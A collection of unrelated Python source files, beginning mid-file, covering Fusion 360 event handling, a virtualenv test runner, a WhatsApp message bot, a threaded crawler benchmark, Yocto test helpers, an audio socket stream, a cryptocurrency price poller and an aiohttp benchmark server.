'instance', instance_uuid, 'trigger monitor', 'finished', None, None)
time.sleep(1)
# No longer running, clean up all trigger deaemons
for instance_uuid in observers:
os.kill(observers[instance_uuid].pid, signal.SIGKILL)
|
events.py
|
# Event managing.
#
# Allows catching events with functions instead of classes.
# Tracks registered events and allows clean-up with one function call.
# All event callbacks are also wrapped in an error.ErrorCatcher().
#
# This file is part of thomasa88lib, a library of useful Fusion 360
# add-in/script functions.
#
# Copyright (c) 2020 Thomas Axelsson
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import adsk.core, adsk.fusion, adsk.cam
import sys, time
import threading, traceback
# Avoid Fusion namespace pollution
from . import error, utils
# Try to resolve base class automatically
AUTO_HANDLER_CLASS = None
class EventsManager:
def __init__(self, error_catcher=None):
#Declared in init to allow multiple commands to use a single lib
self.handlers = []
self.custom_event_names = []
self.app, self.ui = utils.AppObjects()
self.next_delay_id = 0
self.delayed_funcs = {}
self.delayed_event = None
self.delayed_event_id = utils.get_caller_path() + '_delay_event'
self.error_catcher = error_catcher if error_catcher != None else error.ErrorCatcher()
#Assigning
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def add_handler(self, event, base_class=AUTO_HANDLER_CLASS, callback=None):
"""`AUTO_HANDLER_CLASS` results in:
1: Getting the classType
2: Adding 'Handler' to the end
3: Splitting at '::'
4: Getting the module using the first segment
5: sets baseClass to the return of getattr using the base and all subsequent segments (should be 1)"""
if base_class == AUTO_HANDLER_CLASS:
handler_classType_name = event.classType() + 'Handler'
handler_class_parts = handler_classType_name.split('::')
base_class = sys.modules[handler_class_parts[0]]
for cls in handler_class_parts[1:]: base_class = getattr(base_class, cls)
handler_name = base_class.__name__ + '_' + callback.__name__
handler_class = type(handler_name, (base_class,), {"notify": error._error_catcher_wrapper(self, callback)})
handler_class.__init__ = lambda self: super(handler_class, self).__init__()
handler = handler_class()
handler_info = (handler, event)
result = event.add(handler)
if not result: raise Exception('Failed to add handler ' + callback.__name__)
self.handlers.append(handler_info)# Avoid garbage collection
return handler_info
def register_event(self, name):
# Unregisters to make sure there is not an old event registered due to a bad stop
self.app.unregisterCustomEvent(name)
# Registers new event
event = self.app.registerCustomEvent(name)
if event: self.custom_event_names.append(name)
return event
#Timing
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def delay(self, func, secs=0):
'''Puts a function at the end of the event queue, and optionally delays it. '''
if self.delayed_event is None:# Register the event. Will be removed when user runs clean_up()
self.delayed_event = self.register_event(self.delayed_event_id)
self.add_handler(self.delayed_event, callback=self._delayed_event_handler)
delay_id = self.next_delay_id
self.next_delay_id += 1
def waiter():
time.sleep(secs)
self.app.fireCustomEvent(self.delayed_event_id, str(delay_id))
self.delayed_funcs[delay_id] = func
if secs > 0:
thread = threading.Thread(target=waiter)
thread.isDaemon = True
thread.start()
else: self.app.fireCustomEvent(self.delayed_event_id, str(delay_id))
def _delayed_event_handler(self, args: adsk.core.CustomEventArgs):
delay_id = int(args.additionalInfo)
func = self.delayed_funcs.pop(delay_id, None)
func()
#Removing
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def remove_handler(self, handler_info):
handler, event = handler_info
self.handlers.remove(handler_info)
event.remove(handler)
return None # Let user assign their handle with the return value
def remove_all_handlers(self):
for handler, event in self.handlers:
event.remove(handler)
self.handlers.clear()
def unregister_all_events(self):
for event_name in self.custom_event_names:
self.app.unregisterCustomEvent(event_name)
self.custom_event_names.clear()
def clean_up(self, oldControl = None):
"""`oldControl` is an optional variable that, if/when provided, the function: \\
`utils.clear_ui_items(oldControl)` \\
is called, which attempts to remove the control after cleanup"""
self.remove_all_handlers()
self.unregister_all_events()
if oldControl != None: utils.clear_ui_items(oldControl)
|
greenenv.py
|
# -*- coding: utf-8 -*-
"""
Run scripts in a clean virtual environment.
Useful for testing, building, and deploying.
:author: Andrew B Godbehere
:date: 4/21/16
"""
import venv
import sys
import os
from urllib.parse import urlparse
from urllib.request import urlretrieve
from threading import Thread
from subprocess import Popen, PIPE
import os.path
import types
import shlex
import os
artifact_path = '.greenenv'
if not os.path.exists(artifact_path):
os.makedirs(artifact_path)
import tempfile
class ExtendedEnvBuilder(venv.EnvBuilder):
"""
This builder installs setuptools and pip so that you can pip or
easy_install other packages into the created environment.
Note: This class is from stdlib docs, with some minor modifications.
:param nodist: If True, setuptools and pip are not installed into the
created environment.
:param nopip: If True, pip is not installed into the created
environment.
:param context: Information and environment variables for the virtual environment being created
:param verbose: Flag, whether or not to show output from scripts run in environment
"""
def __init__(self, *args, **kwargs):
# self.nodist = kwargs.pop('nodist', False)
# self.nopip = kwargs.pop('nopip', False)
self.verbose = kwargs.pop('verbose', False)
self.context = None
self.python_name = None
super().__init__(*args, **kwargs)
def create(self, env_dir, python_name=None):
"""
Create a virtual environment
:param env_dir:
:param python_name:
:return:
"""
if python_name is not None:
self.python_name = python_name
else:
self.python_name = "python3"
super().create(env_dir)
return clean_env(self.context, self.verbose)
def ensure_directories(self, env_dir):
"""
Create the directories for the environment.
Note: Minor modifications made to original method from venv.
Returns a context object which holds paths in the environment,
for use by subsequent logic.
"""
def create_if_needed(d):
if not os.path.exists(d):
os.makedirs(d)
elif os.path.islink(d) or os.path.isfile(d):
raise ValueError('Unable to create directory %r' % d)
if os.path.exists(env_dir) and self.clear:
self.clear_directory(env_dir)
context = types.SimpleNamespace()
context.env_dir = env_dir
context.env_name = os.path.split(env_dir)[1]
context.prompt = '(%s) ' % context.env_name
create_if_needed(env_dir)
env = os.environ
# Note: If running this from inside a virtual environment, do some extra work to untangle from current venv.
if 'VIRTUAL_ENV' in os.environ:
vpath = os.environ['VIRTUAL_ENV']
base_binpath = os.pathsep.join(
[x for x in os.environ['PATH'].split(os.pathsep) if not x.startswith(vpath)]
)
executable = None
for p in base_binpath.split(os.pathsep):
exepath = os.path.join(p, self.python_name)
if os.path.exists(exepath):
executable = exepath
break
if not executable:
raise RuntimeError("No valid python executable discovered.")
else:
if sys.platform == 'darwin' and '__PYVENV_LAUNCHER__' in env:
executable = os.environ['__PYVENV_LAUNCHER__']
else:
executable = sys.executable
# TODO: Look for specified python distribution when outside of a virtual env when running
dirname, exename = os.path.split(os.path.abspath(executable))
context.executable = executable
context.python_dir = dirname
context.python_exe = exename
if sys.platform == 'win32':
binname = 'Scripts'
incpath = 'Include'
libpath = os.path.join(env_dir, 'Lib', 'site-packages')
else:
binname = 'bin'
incpath = 'include'
libpath = os.path.join(env_dir, 'lib',
'python%d.%d' % sys.version_info[:2],
'site-packages')
context.inc_path = path = os.path.join(env_dir, incpath)
create_if_needed(path)
create_if_needed(libpath)
# Issue 21197: create lib64 as a symlink to lib on 64-bit non-OS X POSIX
if ((sys.maxsize > 2 ** 32) and (os.name == 'posix') and
(sys.platform != 'darwin')):
link_path = os.path.join(env_dir, 'lib64')
if not os.path.exists(link_path): # Issue #21643
os.symlink('lib', link_path)
context.bin_path = binpath = os.path.join(env_dir, binname)
context.bin_name = binname
context.env_exe = os.path.join(binpath, exename)
create_if_needed(binpath)
self.context = context
return context
class clean_env:
"""
Manage a clean environment.
"""
def __init__(self, context, verbose):
self.context = context
self.verbose = verbose
def reader(self, stream):
"""
Read lines from a subprocess' output stream and either pass to a progress
callable (if specified) or write progress information to sys.stderr.
"""
while True:
s = stream.readline()
if not s:
break
if not self.verbose:
sys.stderr.write('.')
else:
sys.stderr.write(s.decode('utf-8'))
sys.stderr.flush()
stream.close()
def install_pip(self):
name = 'pip'
url = 'https://bootstrap.pypa.io/get-pip.py'
_, _, path, _, _, _ = urlparse(url)
fn = os.path.split(path)[-1]
binpath = self.context.bin_path
print("BINPATH: {}".format(binpath))
distpath = os.path.join(binpath, fn)
print("DISTPATH: {}".format(distpath))
# Download script into the env's binaries folder
urlretrieve(url, distpath)
term = ''
sys.stderr.write('Installing %s ...%s' % (name, term))
sys.stderr.flush()
# Install in the env
self.run_in_env(os.path.join(binpath, fn))
os.unlink(distpath)
# TODO: 'save' function, to save artifacts to artifact_path
# TODO: Option to run in a tmp directory, offer options to copy supporting files into directory?
# TODO: Control env vars like PATH
# TODO: Set include files/directories to copy into tmp directory
# TODO: Build python wheel with -t to specify location of wheel file
# TODO: pip options, like local path to search, --find-links...
def install_dependency(self, dep, **kwargs):
if isinstance(dep, str):
dep = [dep]
dep_str = ' '.join(dep)
kwargstr = ' '.join(["--{key} {val}".format(key=k.replace('_', '-'), val=v)
for k, v in iter(kwargs.items())])
cmd = os.path.join(self.context.bin_path, 'pip') + ' install ' + dep_str + ' ' + kwargstr
parsed_cmd = shlex.split(cmd)
print("FULL CMD: {}".format(cmd))
print("PARSED CMD: {}".format(parsed_cmd))
p = Popen(parsed_cmd, stdout=PIPE, stderr=PIPE, env=self.new_environ, cwd='.',
start_new_session=True)
t1 = Thread(target=self.reader, args=(p.stdout,))
t1.start()
t2 = Thread(target=self.reader, args=(p.stderr,))
t2.start()
p.wait()
t1.join()
t2.join()
def run_in_env(self, script):
splitscript = shlex.split(script)
p = Popen([self.context.python_exe] + splitscript, stdout=PIPE, stderr=PIPE, env=self.new_environ,
cwd='.', start_new_session=True)
t1 = Thread(target=self.reader, args=(p.stdout,))
t1.start()
t2 = Thread(target=self.reader, args=(p.stderr,))
t2.start()
p.wait()
t1.join()
t2.join()
if p.returncode != 0: # mirror nonzero return call from child process
sys.exit(p.returncode)
def __enter__(self):
# activate
if 'VIRTUAL_ENV' in os.environ:
vpath = os.environ['VIRTUAL_ENV']
base_binpath = os.pathsep.join([x for x in os.environ['PATH'].split(os.pathsep)
if not x.startswith(vpath)])
else:
base_binpath = os.environ['PATH']
self.new_environ = dict(os.environ)
self.new_environ['VIRTUAL_ENV'] = self.context.env_dir
self.new_environ['PATH'] = self.context.bin_path + os.pathsep + base_binpath
if "PYTHONHOME" in self.new_environ:
print("HAS PYTHONHOME")
self.new_environ.pop("PYTHONHOME")
self.install_pip()
return self
def __exit__(self, exc_type, exc_value, traceback):
# TODO: Optionally remove the virtual environment.
pass
if __name__ == "__main__":
env = ExtendedEnvBuilder(verbose=True)
# Note: Will always create a clean copy of current python environment.
# Relies on other tools, build systems, to iterate over multiple python executables.
with env.create('foo', 'python3.5') as fooenv:
# for k, v in iter(fooenv.context.__dict__.items()):
# print("{}: {}".format(k, v))
target_dir = os.path.expanduser("~/tmp")
print("TARGET DIR: {}".format(target_dir))
fooenv.install_dependency(
[os.path.expanduser('~/Code/anser-indicus/'), 'numpy', 'pymystem3', 'tables', 'pyparsing',
'scipy', 'sklearn']) # , other_args="-t {}".format(target_dir))
fooenv.run_in_env('../tests/helloworld.py')
|
Triggerwithcommandcenter.py
|
from WhatsappTrigger import whatsapp,WhatsappBot # import all required modules ( main modules )
from whatsappCommandExcutor.CommandExcutor import WpReciverCommand # this module will reciver msg aka command from whatsapp { main modules }
from whatsappCommandExcutor.hook import CommandHook # this modules this hook whatsapp msg with a funcation
from cprint import * # ( this modules is only for printing color full debug information )
from os import getcwd # getcwd funcation return current dir
import threading
from time import sleep # this modules will used to wait the program
def Startcommandreciver(driv):
reciver = WpReciverCommand()
setHook = CommandHook()
while True:
setHook.Hook(reciver.getmsg(driv))
sleep(1)
def FireUpthreads(driv):
reciverThread = threading.Thread(target=Startcommandreciver,args=(driv,))
reciverThread.setDaemon(True) # set this thread in demon mode to this thread will exit with main
reciverThread.setName("reciverThread")
reciverThread.start() # starting the thread
try:
app = WhatsappBot.WhatsappSendMsg(getcwd() + "/webdriver/chromedriver") # create object of sendmsg class this class will help setup everything you need to do to send msg on whatsapp this class required chromedriver path
driv = app.find_user("tesing") # this find_user funcation will find the user and enter in his chat and will return a chrome driver
wapp = whatsapp.Trigger(app, driv) # this Trigger object is responsable for sending msg using WhatsappSendMsg object and the driver thats find user returned
FireUpthreads(driv) # this funcation will fireup threader this will responsable for reciving msg in parallel
while True:
wapp.send_msg(input("#Enter your message => ")) # send msg funcation will send the message
cprint.info("DONE") # print success message
except KeyboardInterrupt:
app.quit(driv) # quit the app if user press ( ctrl + c )
print("")
cprint.info("Goodbye")
|
multi_thread.py
|
import requests
import time
from threading import Thread
urls = [
f'https://www.cnblogs.com/#p{page}'
for page in range(1, 51)
]
def craw(url):
response = requests.get(url).text
# 单线程
def single_thread(urls):
start = time.time()
print('单线程 开始')
for url in urls:
craw(url)
print('单线程 结束')
end = time.time()
print(f'花费了{end - start}秒')
# 多线程
# 两种创建方式 1.重写run方法 2.直接创建
# Python3.x 和 Python2.x 的一个区别是: Python 3 可以使用直接使用 super().xxx 代替 super(Class, self).xxx :
# 重构run函数必须写 super()特殊函数 让你可以调用父类的方法 这行代码让python调用Thread类的方法__init()
# 让 inherit_thread 的实例包含这个方法中定义的所有属性
class inherit_thread(Thread):
def __init__(self, url):
super().__init__()
self.url = url
def run(self):
craw(self.url)
if __name__ == '__main__':
# 单线程
single_thread(urls)
print('--------------------------------------------------------------------------------------')
# 多线程 1
print('多线程 开始')
start = time.time()
thread_list = []
for url in urls:
thread = inherit_thread(url)
thread_list.append(thread)
for thread in thread_list:
thread.start()
for thread in thread_list:
thread.join()
end = time.time()
print('多线程 结束')
print(f'共花费了{end - start}s')
print('--------------------------------------------------------------------------------------')
# 多线程 2
thread_list = []
print('多线程 开始')
start = time.time()
for url in urls:
thread = Thread(target=craw, args=(url,))
thread_list.append(thread)
for thread in thread_list:
thread.start()
for thread in thread_list:
thread.join()
end = time.time()
print('多线程 结束')
print(f'共花费了{end - start}s')
|
commands.py
|
# Copyright (c) 2013-2014 Intel Corporation
#
# Released under the MIT license (see COPYING.MIT)
# DESCRIPTION
# This module is mainly used by scripts/oe-selftest and modules under meta/oeqa/selftest
# It provides a class and methods for running commands on the host in a convienent way for tests.
import os
import sys
import signal
import subprocess
import threading
import logging
from oeqa.utils import CommandError
from oeqa.utils import ftools
import re
class Command(object):
def __init__(self, command, bg=False, timeout=None, data=None, **options):
self.defaultopts = {
"stdout": subprocess.PIPE,
"stderr": subprocess.STDOUT,
"stdin": None,
"shell": False,
"bufsize": -1,
}
self.cmd = command
self.bg = bg
self.timeout = timeout
self.data = data
self.options = dict(self.defaultopts)
if isinstance(self.cmd, basestring):
self.options["shell"] = True
if self.data:
self.options['stdin'] = subprocess.PIPE
self.options.update(options)
self.status = None
self.output = None
self.error = None
self.thread = None
self.log = logging.getLogger("utils.commands")
def run(self):
self.process = subprocess.Popen(self.cmd, **self.options)
def commThread():
self.output, self.error = self.process.communicate(self.data)
self.thread = threading.Thread(target=commThread)
self.thread.start()
self.log.debug("Running command '%s'" % self.cmd)
if not self.bg:
self.thread.join(self.timeout)
self.stop()
def stop(self):
if self.thread.isAlive():
self.process.terminate()
# let's give it more time to terminate gracefully before killing it
self.thread.join(5)
if self.thread.isAlive():
self.process.kill()
self.thread.join()
self.output = self.output.rstrip()
self.status = self.process.poll()
self.log.debug("Command '%s' returned %d as exit code." % (self.cmd, self.status))
# logging the complete output is insane
# bitbake -e output is really big
# and makes the log file useless
if self.status:
lout = "\n".join(self.output.splitlines()[-20:])
self.log.debug("Last 20 lines:\n%s" % lout)
class Result(object):
pass
def runCmd(command, ignore_status=False, timeout=None, assert_error=True, **options):
result = Result()
cmd = Command(command, timeout=timeout, **options)
cmd.run()
result.command = command
result.status = cmd.status
result.output = cmd.output
result.pid = cmd.process.pid
if result.status and not ignore_status:
if assert_error:
raise AssertionError("Command '%s' returned non-zero exit status %d:\n%s" % (command, result.status, result.output))
else:
raise CommandError(result.status, command, result.output)
return result
def bitbake(command, ignore_status=False, timeout=None, postconfig=None, **options):
if postconfig:
postconfig_file = os.path.join(os.environ.get('BUILDDIR'), 'oeqa-post.conf')
ftools.write_file(postconfig_file, postconfig)
extra_args = "-R %s" % postconfig_file
else:
extra_args = ""
if isinstance(command, basestring):
cmd = "bitbake " + extra_args + " " + command
else:
cmd = [ "bitbake" ] + [a for a in (command + extra_args.split(" ")) if a not in [""]]
try:
return runCmd(cmd, ignore_status, timeout, **options)
finally:
if postconfig:
os.remove(postconfig_file)
def get_bb_env(target=None, postconfig=None):
if target:
return bitbake("-e %s" % target, postconfig=postconfig).output
else:
return bitbake("-e", postconfig=postconfig).output
def get_bb_var(var, target=None, postconfig=None):
val = None
bbenv = get_bb_env(target, postconfig=postconfig)
lastline = None
for line in bbenv.splitlines():
if re.search("^(export )?%s=" % var, line):
val = line.split('=')[1]
val = val.strip('\"')
break
elif re.match("unset %s$" % var, line):
# Handle [unexport] variables
if lastline.startswith('# "'):
val = lastline.split('\"')[1]
break
lastline = line
return val
def get_test_layer():
layers = get_bb_var("BBLAYERS").split()
testlayer = None
for l in layers:
if '~' in l:
l = os.path.expanduser(l)
if "/meta-selftest" in l and os.path.isdir(l):
testlayer = l
break
return testlayer
def create_temp_layer(templayerdir, templayername, priority=999, recipepathspec='recipes-*/*'):
os.makedirs(os.path.join(templayerdir, 'conf'))
with open(os.path.join(templayerdir, 'conf', 'layer.conf'), 'w') as f:
f.write('BBPATH .= ":${LAYERDIR}"\n')
f.write('BBFILES += "${LAYERDIR}/%s/*.bb \\' % recipepathspec)
f.write(' ${LAYERDIR}/%s/*.bbappend"\n' % recipepathspec)
f.write('BBFILE_COLLECTIONS += "%s"\n' % templayername)
f.write('BBFILE_PATTERN_%s = "^${LAYERDIR}/"\n' % templayername)
f.write('BBFILE_PRIORITY_%s = "%d"\n' % (templayername, priority))
f.write('BBFILE_PATTERN_IGNORE_EMPTY_%s = "1"\n' % templayername)
|
AudioServerStream.py
|
import errno
import threading
from six.moves import queue
import socket
import time
# Audio recording parameters
RATE = 44100
CHUNK = 1600
class AudioServerStream(object):
"""Opens a recording stream as a generator yielding the audio chunks."""
def __init__(self, rate=RATE, chunk=CHUNK, server_name='127.0.0.1',
port=4444):
self._rate = rate
self._chunk = chunk
self._server_name = server_name
self._port = port
# Socket for connection
self.s = None
self._connected = False
# Audio data thread to get data from server
self.data_thread = threading.Thread(target=self._get_server_data)
self.data_thread.daemon = True
# Create a thread-safe buffer of audio data
self._buff = queue.Queue()
self.closed = True
def _connect(self):
"""Creates a socket to listen for audio data from the server."""
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.s.connect((self._server_name, self._port))
self._connected = True
def _get_server_data(self):
"""Daemon thread that receives data from the audio socket and puts in a
buffer. Works just like _get_audio_data but data comes from server,
not mic.
"""
try:
while True:
data = self.s.recv(self._chunk)
self._buff.put(data)
except KeyboardInterrupt as e:
print("AUDIO_SERVER: Shutdown from thread: {}".format(e))
self.__exit__()
def __enter__(self):
"""Makes 3 attempts at connecting to the audio server defined in the
parameters file.
"""
print("AUDIO_SERVER: Using audio server.")
# Retry 3 times to connect
MAX_CONNECTION_RETRY = 3
for _ in range(0, MAX_CONNECTION_RETRY):
try:
self._connect()
except socket.error as e:
print("AUDIO_SERVER: Socket exception caught!\n{}\n"
"Retrying...".format(e))
time.sleep(1)
continue
break
# Yay :)
if self._connected:
print("AUDIO_SERVER: Connected to audio server.")
self.data_thread.start()
self.closed = False
return self
# Nay :c
else:
raise errno.ECONNREFUSED("AUDIO_SERVER: Unable to connect to audio "
"server! Make sure it is running and you "
"are connected on the same network.")
def __exit__(self, type, value, traceback):
self.data_thread.join()
self.s.shutdown()
self.s.close()
self.closed = True
# Signal the generator to terminate so that the client's
# streaming_recognize method will not block the process termination.
self._buff.put(None)
def generator(self):
while not self.closed:
# Use a blocking get() to ensure there's at least one chunk of
# data, and stop iteration if the chunk is None, indicating the
# end of the audio stream.
chunk = self._buff.get()
if chunk is None:
return
data = [chunk]
# Now consume whatever other data's still buffered.
while True:
try:
chunk = self._buff.get(block=False)
if chunk is None:
return
data.append(chunk)
except queue.Empty:
break
yield b''.join(data)
|
coin_database.py
|
# Copyright (c) 2021, coincell
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# The views and conclusions contained in the software and documentation are those
# of the authors and should not be interpreted as representing official policies,
# either expressed or implied, of the FreeBSD Project.
import requests
import threading
import json
import re
from exceptions import *
from utils import CoinPrice
class CoinMetadata:
def __init__(self, code, name, price, rank, volume_24h, market_cap, available_supply,
total_supply, max_supply, change_1h, change_24h, change_7d):
self.code = code
self.name = name
self.price = price
self.rank = rank
self.volume_24h = volume_24h
self.market_cap = market_cap
self.available_supply = available_supply
self.total_supply = total_supply
self.max_supply = max_supply
self.change_1h = change_1h
self.change_24h = change_24h
self.change_7d = change_7d
class CoinDatabase:
API_URL = 'https://api.coinmarketcap.com/v1/ticker/?convert={0}'
WEB_URL = 'https://coinmarketcap.com/all/views/all/'
VALID_FIAT_CURRENCIES = set([
'aud', 'brl', 'cad', 'chf', 'clp', 'cny', 'czk', 'dkk', 'eur', 'gbp', 'hkd', 'huf', 'idr',
'ils', 'inr', 'jpy', 'krw', 'mxn', 'myr', 'nok', 'nzd', 'php', 'pkr', 'pln', 'rub', 'sek',
'sgd', 'thb', 'try', 'twd', 'zar', 'usd'
])
def __init__(self, fiat_currency):
self.fiat_currency = fiat_currency.lower()
if self.fiat_currency not in CoinDatabase.VALID_FIAT_CURRENCIES:
raise ConfigException('Unknown fiat currency "{0}"'.format(fiat_currency))
self._running = True
self._metadata = {}
self._metadata_condition = threading.Condition()
self._stop_condition = threading.Condition()
self._api_url = CoinDatabase.API_URL.format(self.fiat_currency.upper())
self._web_url = CoinDatabase.WEB_URL
self._update_thread = threading.Thread(target=self.poll_data)
self._update_thread.start()
def stop(self):
self._running = False
with self._stop_condition:
self._stop_condition.notify()
self._update_thread.join()
def wait_for_data(self):
with self._metadata_condition:
if len(self._metadata) == 0:
self._metadata_condition.wait()
def get_currency_price(self, code):
if self.has_coin(code):
price = self.get_currency_metadata(code).price
return CoinPrice(code, price, self.fiat_currency)
else:
return CoinPrice(code)
def get_currency_metadata(self, code):
with self._metadata_condition:
if code in self._metadata:
return self._metadata[code]
else:
raise UnknownCurrencyException(code)
def has_coin(self, code):
with self._metadata_condition:
return code in self._metadata
def get_top_coins(self, top_limit):
coins = []
with self._metadata_condition:
for coin in self._metadata.values():
if coin.rank is not None and coin.rank <= top_limit:
coins.append(coin)
return sorted(coins, key=lambda i: i.rank)
def get_coins(self):
with self._metadata_condition:
return self._metadata.values()
def _extract_float(self, value):
return None if value is None else float(value)
def _merge_attribute(self, lhs, rhs, attribute):
if getattr(rhs, attribute) is not None:
setattr(lhs, attribute, getattr(rhs, attribute))
def _add_coin(self, code, coin):
if code in self._metadata:
stored_coin = self._metadata[code]
self._merge_attribute(stored_coin, coin, "name")
self._merge_attribute(stored_coin, coin, "price")
self._merge_attribute(stored_coin, coin, "rank")
self._merge_attribute(stored_coin, coin, "volume_24h")
self._merge_attribute(stored_coin, coin, "market_cap")
self._merge_attribute(stored_coin, coin, "available_supply")
self._merge_attribute(stored_coin, coin, "total_supply")
self._merge_attribute(stored_coin, coin, "max_supply")
self._merge_attribute(stored_coin, coin, "change_1h")
self._merge_attribute(stored_coin, coin, "change_24h")
self._merge_attribute(stored_coin, coin, "change_7d")
else:
self._metadata[code] = coin
def _load_from_api(self):
result = None
try:
raw_result = requests.get(self._api_url)
result = json.loads(raw_result.text)
except Exception as ex:
# TODO: somehow log this
pass
if result is not None:
with self._metadata_condition:
for entry in result:
try:
coin = CoinMetadata(
entry['symbol'],
entry['name'],
self._extract_float(entry['price_' + self.fiat_currency]),
int(entry['rank']),
self._extract_float(entry['24h_volume_' + self.fiat_currency]),
self._extract_float(entry['market_cap_' + self.fiat_currency]),
self._extract_float(entry['available_supply']),
self._extract_float(entry['total_supply']),
self._extract_float(entry['max_supply']),
self._extract_float(entry['percent_change_1h']),
self._extract_float(entry['percent_change_24h']),
self._extract_float(entry['percent_change_7d'])
)
self._add_coin(entry['symbol'], coin)
except Exception as ex:
if 'symbol' in entry:
print 'Failed to parse metadata for "{0}": {1}'.format(
entry['symbol'],
ex
)
else:
print 'Failed to parse currency metadata: {0}'.format(ex)
self._metadata_condition.notify_all()
def _load_from_web(self):
if self.fiat_currency == 'usd':
conversion_rate = 1.0
else:
data = requests.get(self._api_url).text
data = json.loads(data)
# Find the conversion rate between USD and whatever fiat currency we're using
for coin in data:
if coin['symbol'] == 'BTC':
conversion_rate = float(coin['price_' + self.fiat_currency]) / float(coin['price_usd'])
data = requests.get(self._web_url).text
table_start = data.find('id="currencies-all"')
table_end = data.find('</table>', table_start)
table = data[table_start:table_end]
attribute_keys = {
'class="text-center">' : 'rank',
'currency-name-container' : 'name',
'col-symbol' : 'code',
'market-cap' : 'market-cap',
'class="price"' : 'price',
'circulating-supply' : 'circulating-supply',
'class="volume"' : 'volume',
'data-timespan="1h"' : 'change-1h',
'data-timespan="24h"' : 'change-24h',
'data-timespan="7d"' : 'change-7d',
}
price_attributes = ['price', 'market-cap', 'volume']
number_attributes = price_attributes + ['circulating-supply']
percentage_attributes = ['change-1h', 'change-24h', 'change-7d']
with self._metadata_condition:
for entry in table.split('<tr ')[1:]:
attributes = {}
for column in entry.split('<td '):
for key, value in attribute_keys.items():
if key in column:
index = column.find(key)
match = re.findall('>([^<]+)<', column[index:], re.MULTILINE)
match = map(lambda i: i.strip(), match)
match = filter(lambda i: len(i) > 0, match)
if len(match) > 0:
attributes[value] = match[0].strip()
else:
attributes[value] = None
for key in number_attributes:
if attributes.get(key, None):
try:
attributes[key] = float(attributes[key].replace('$', '').replace(',', ''))
except:
attributes[key] = None
for key in price_attributes:
if attributes.get(key, None):
attributes[key] *= conversion_rate
for key in percentage_attributes:
if attributes.get(key, None):
attributes[key] = float(attributes[key].replace('%', ''))
try:
coin = CoinMetadata(
attributes['code'],
attributes['name'],
attributes['price'],
int(attributes['rank']),
attributes['volume'],
attributes['market-cap'],
attributes['circulating-supply'],
None,
None,
attributes.get('change-1h', None),
attributes.get('change-24h', None),
attributes.get('change-7d', None)
)
self._add_coin(attributes['code'], coin)
except Exception as ex:
pass
def poll_data(self):
while self._running:
# Load all coins by parsing coinmarketcap.com/all/views/all/
try:
self._load_from_web()
except:
pass
# Now get some better data for the coins that are served through the API
self._load_from_api()
with self._stop_condition:
# Sleep for 5 minutes
self._stop_condition.wait(60 * 5)
|
async.py
|
import argparse
import asyncio
import collections
import cProfile
import gc
import random
import socket
from statistics import stdev, mean, median
import string
import sys
from multiprocessing import Process, set_start_method, Barrier
import aiohttp
def find_port():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('localhost', 0))
host, port = s.getsockname()
s.close()
return host, port
profiler = cProfile.Profile()
def run_aiohttp(host, port, barrier, profile):
from aiohttp import web
@asyncio.coroutine
def test(request):
txt = 'Hello, ' + request.match_info['name']
return web.Response(text=txt)
@asyncio.coroutine
def prepare(request):
gc.collect()
return web.Response(text='OK')
@asyncio.coroutine
def stop(request):
loop.call_later(0.1, loop.stop)
return web.Response(text='OK')
@asyncio.coroutine
def init(loop):
app = web.Application(loop=loop)
app.router.add_route('GET', '/prepare', prepare)
app.router.add_route('GET', '/stop', stop)
app.router.add_route('GET', '/test/{name}', test)
handler = app.make_handler(keep_alive=15, timeout=None)
srv = yield from loop.create_server(handler, host, port)
return srv, app, handler
loop = asyncio.get_event_loop()
srv, app, handler = loop.run_until_complete(init(loop))
barrier.wait()
if profile:
profiler.enable()
loop.run_forever()
srv.close()
loop.run_until_complete(handler.finish_connections())
